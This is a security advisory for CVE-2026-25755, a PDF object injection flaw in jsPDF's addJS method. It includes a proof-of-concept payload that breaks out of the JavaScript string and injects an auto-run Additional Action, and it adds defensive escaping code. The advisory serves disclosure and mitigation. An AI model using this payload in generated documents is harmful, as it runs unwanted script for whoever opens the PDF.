CVE-2026-25755

HIGH 8.1 | EPSS 0.03%

jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method

Published: 2/19/2026 | Modified: 3/19/2026
Also known as: GHSA-9vjf-qc39-jprp, CGA-vfrc-gxq2-7x42

Description

### Impact

User control of the argument of the `addJS` method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.

```js
import { jsPDF } from "jspdf";

const doc = new jsPDF();

// Payload:
// 1. ) closes the JS string.
// 2. >> closes the current dictionary.
// 3. /AA ... injects an "Additional Action" that executes on focus/open.
const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";

doc.addJS(maliciousPayload);
doc.save("vulnerable.pdf");
```

### Patches

The vulnerability has been fixed in [email protected].

### Workarounds

Escape parentheses in user-provided JavaScript code before passing it to the `addJS` method.

### References

https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md
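The workaround above, as an added example (not code from the advisory or from jsPDF). It assumes the affected `addJS` writes its argument between `(` and `)` as a PDF literal string, and it goes one step beyond the stated workaround by escaping backslashes as well, because a backslash left in front of an escaped parenthesis cancels the escape. The helper names `escapePdfLiteralString`, `escapeParensOnly`, `literalStringEnd` and `unescapeLiteral` are hypothetical.

```javascript
// Added example (not jsPDF code). Escapes text for a PDF literal string "( ... )".
function escapePdfLiteralString(text) {
  // One pass over backslash and both parentheses: each gets a leading backslash.
  return String(text).replace(/[\\()]/g, (ch) => "\\" + ch);
}

// Weak variant for comparison: parentheses only, backslashes left alone.
function escapeParensOnly(text) {
  return String(text).replace(/[()]/g, (ch) => "\\" + ch);
}

// Hypothetical checker: index of the ")" at which a PDF parser would end the
// literal string whose body is `body`, or -1 if the body never closes it.
function literalStringEnd(body) {
  let depth = 0;
  for (let i = 0; i < body.length; i++) {
    const ch = body[i];
    if (ch === "\\") { i++; continue; } // escape: skip the next character
    if (ch === "(") depth++;
    else if (ch === ")") {
      if (depth === 0) return i;        // unbalanced ")" terminates the string
      depth--;
    }
  }
  return -1;
}

// Reverses the three escapes produced above (not a full PDF string decoder).
function unescapeLiteral(body) {
  return body.replace(/\\([\\()])/g, "$1");
}

// Payload string taken from the advisory text.
const payload =
  "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";
// Constructed edge case: a backslash directly before the parenthesis.
const edge = "x\\) >> /AA";

console.log(literalStringEnd(payload));                         // 20
console.log(literalStringEnd(escapePdfLiteralString(payload))); // -1
console.log(literalStringEnd(escapeParensOnly(edge)));          // 3
console.log(literalStringEnd(escapePdfLiteralString(edge)));    // -1
```

Pre-escape only on versions without the fix: if the library already escapes the string itself, escaping twice leaves stray backslashes in the script.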

CVSS scores

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 3.1 | HIGH 8.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
